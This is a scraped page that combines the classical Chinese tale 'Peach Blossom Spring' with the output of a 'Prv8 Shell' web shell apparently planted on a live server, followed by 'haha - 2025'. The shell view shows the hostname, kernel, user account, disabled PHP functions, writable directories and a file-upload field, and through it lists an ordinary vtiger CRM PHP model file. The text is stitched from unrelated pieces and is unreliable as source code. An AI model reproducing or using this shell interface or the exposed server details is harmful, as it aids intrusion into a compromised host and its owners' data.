晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/akaindir/public_html/crm/modules/Inventory/models/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //home/akaindir/public_html/crm/modules/Inventory/models/Charges.php
<?php
/*+**********************************************************************************
 * The contents of this file are subject to the vtiger CRM Public License Version 1.1
 * ("License"); You may not use this file except in compliance with the License
 * The Original Code is: vtiger CRM Open Source
 * The Initial Developer of the Original Code is vtiger.
 * Portions created by vtiger are Copyright (C) vtiger.
 * All Rights Reserved.
 ************************************************************************************/

class Inventory_Charges_Model extends Vtiger_Base_Model {

	const CHARGES_TABLE_NAME = 'vtiger_inventorycharges';

	public function getId() {
		return $this->get('chargeid');
	}

	public function getName() {
		return $this->get('name');
	}

	public function getValue() {
		return $this->get('value');
	}

	public function isTaxable() {
		return $this->get('istaxable');
	}

	public static function getCreateChargeUrl() {
		return '?module=Vtiger&parent=Settings&view=TaxAjax&mode=editCharge';
	}

	public function getEditChargeUrl() {
		return '?module=Vtiger&parent=Settings&view=TaxAjax&mode=editCharge&chargeId='.$this->getId();
	}

	public function getDeleteChargeUrl() {
		return '?module=Vtiger&parent=Settings&action=TaxAjax&mode=deleteCharge&chargeId='.$this->getId();
	}

	public function getSelectedRegions() {
		$regions = $this->get('regions');
		if ($regions) {
			return Zend_Json::decode(html_entity_decode($regions));
		}
		return array();
	}

	public function getDisplayValue() {
		$value = $this->getValue();
		if ($this->get('format') === 'Flat') {
			$value = CurrencyField::convertToUserFormat($value, null, true);
		} else {
			$value = number_format($value, getCurrencyDecimalPlaces(), '.', '') . '%';
		}
		return $value;
	}

	/**
	 * Function to get selected taxes
	 * @param <Boolean> $deleted
	 * @return <Array> list of Inventory_TaxRecord_Model
	 */
	public function getSelectedTaxes($deleted = true) {
		if (!$this->taxes) {
			$taxModelsList = array();
			$isTaxable = $this->isTaxable();
			if ($isTaxable) {
				$taxes = $this->get('taxes');
				if (!is_array($taxes)) {
					$taxes = Zend_Json::decode(html_entity_decode($this->get('taxes')));
				}

				$db = PearDatabase::getInstance();
				$query = 'SELECT * FROM '.Inventory_TaxRecord_Model::CHARGES_TAX_TABLE_NAME.' WHERE taxid IN ('.generateQuestionMarks($taxes).')';
				if ($deleted) {
					$query .= 'AND deleted = 0';
				}

				$result = $db->pquery($query, $taxes);
				while($rowData = $db->fetch_array($result)) {
					$taxModelsList[$rowData['taxid']] = new Inventory_TaxRecord_Model($rowData);
				}
			}
			$this->taxes = $taxModelsList;
		}
		return $this->taxes;
	}

	/**
	 * Function to save the charge details
	 * @return <Number> charge id
	 */
	public function save() {
		$db = PearDatabase::getInstance();
		$chargeId = $this->getId();

		$regions = Zend_Json::encode($this->get('regions'));
		$taxes = Zend_Json::encode($this->get('taxes'));
		$params = array($this->getName(), $this->get('format'), $this->get('type'), $this->getValue(), $regions, $this->get('istaxable'), $taxes);

		if($chargeId) {
			$query = 'UPDATE '.self::CHARGES_TABLE_NAME.' SET name=?, format=?, type=?, value=?, regions=?, istaxable=?, taxes=? WHERE chargeid=?';
			$params[] = $chargeId;
			$db->pquery($query,$params);
		} else {
			$query = 'INSERT INTO '.self::CHARGES_TABLE_NAME.'(name, format, type, value, regions, istaxable, taxes) VALUES('.generateQuestionMarks($params).')';
			$db->pquery($query,$params);

			$result = $db->pquery('SELECT chargeid FROM '.self::CHARGES_TABLE_NAME.' WHERE name=?', array($this->getName()));
			$this->set('chargeid', $db->query_result($result, 0, 'chargeid'));
		}
		return $this->getId();
	}

	/**
	 * Function to get list of charges
	 * @return <Array> list of Inventory_Charges_Models
	 */
	public static function getInventoryCharges() {
		$db = PearDatabase::getInstance();
		$inventoryChargeModelsList = array();

		$result = $db->pquery('SELECT * FROM '.self::CHARGES_TABLE_NAME.' WHERE deleted=?', array(0));
		while($rowData = $db->fetch_array($result)) {
			$inventoryChargeModelsList[$rowData['chargeid']] = new self($rowData);
		}
		return $inventoryChargeModelsList;
	}

	/**
	 * Function to get charge model
	 * @param <Number> $chargeId
	 * @return <Inventory_Charges_Model>
	 */
	public static function getChargeModel($chargeId = false) {
		if ($chargeId) {
			$db = PearDatabase::getInstance();
			$result = $db->pquery('SELECT * FROM '.self::CHARGES_TABLE_NAME.' WHERE chargeid=? AND deleted = 0', array($chargeId));
			while($rowData = $db->fetch_array($result)) {
				$chargeRecordModel = new self($rowData);
			}
		} else {
			$chargeRecordModel = new self();
		}
		return $chargeRecordModel;
	}

	/**
	 * Function to delete selected charges
	 * @param <Array> $chargeIdsList
	 * @return <Boolean> True/False
	 */
	public static function deleteCharges($chargeIdsList = array()) {
		if ($chargeIdsList) {
			if (!is_array($chargeIdsList)) {
				$chargeIdsList = array($chargeIdsList);
			}
			$db = PearDatabase::getInstance();
			$db->pquery('UPDATE '.self::CHARGES_TABLE_NAME.' SET deleted=1 WHERE chargeid IN ('.generateQuestionMarks($chargeIdsList).')', $chargeIdsList);
		}
		return true;
	}

	/**
	 * Function to get Inventory_Charges_Model model by using region id
	 * @param <Number> $regionId
	 * @return <Array> list of Inventory_Charges_Models
	 */
	public static function getInstancesByRegionId($regionId) {
		$db = PearDatabase::getInstance();
		$recordModelsList = array();

		$result = $db->pquery('SELECT * FROM '.self::CHARGES_TABLE_NAME.' WHERE regions LIKE (?) AND deleted = 0', array("%\"$regionId\"%"));
		while($rowData = $db->fetch_array($result)) {
			$recordModelsList[$rowData['chargeid']] = new self($rowData);
		}
		return $recordModelsList;
	}

	/**
	 * Function to get charge models list
	 * @param <Array> $idsList
	 * @param <String> $type
	 * @return <Array> list of Inventory_Charges_Models
	 */
	public static function getChargeModelsList($idsList = array(), $type = 'all') {
		$chargeModelsList = array();
		if ($idsList) {
			$db = PearDatabase::getInstance();
			$sql = 'SELECT * FROM '.self::CHARGES_TABLE_NAME.' WHERE chargeid IN ('.  generateQuestionMarks($idsList).')';
			if ($type != 'all') {
				$sql .= ' AND deleted = 0';
			}

			$result = $db->pquery($sql, $idsList);
			while($rowData = $db->fetch_array($result)) {
				$chargeModelsList[$rowData['chargeid']] = new self($rowData);
			}
		}
		return $chargeModelsList;
	}

	/**
	 * Function to get charges taxes list
	 * @return <Array> list of Inventory_TaxRecord_Models
	 */
	public static function getChargeTaxesList() {
		$chargeTaxesList = array();
		foreach (Inventory_Charges_Model::getInventoryCharges() as $chargeId => $chargeModel) {
			foreach ($chargeModel->getSelectedTaxes() as $taxId => $taxModel) {
				$chargeTaxesList[$chargeId][$taxId] = $taxModel->getData();
			}
		}
		return $chargeTaxesList;
	}

	/**
	 * Function to check duplicate charge name
	 * @param <String> $chargeName
	 * @param <Number> $excludedId
	 * @return <Boolean> True/False
	 */
	public static function checkDuplicateInventoryCharge($chargeName, $excludedId = false) {
		$db = PearDatabase::getInstance();

		$query = 'SELECT 1 FROM '.self::CHARGES_TABLE_NAME.' WHERE name=? AND deleted=?';
		$params = array($chargeName, '0');

		if ($excludedId) {
			$query .= ' AND chargeid != ?';
			$params[] = $excludedId;
		}

		$result = $db->pquery($query, $params);
		return ($db->num_rows($result) > 0) ? true : false;
	}

}

haha - 2025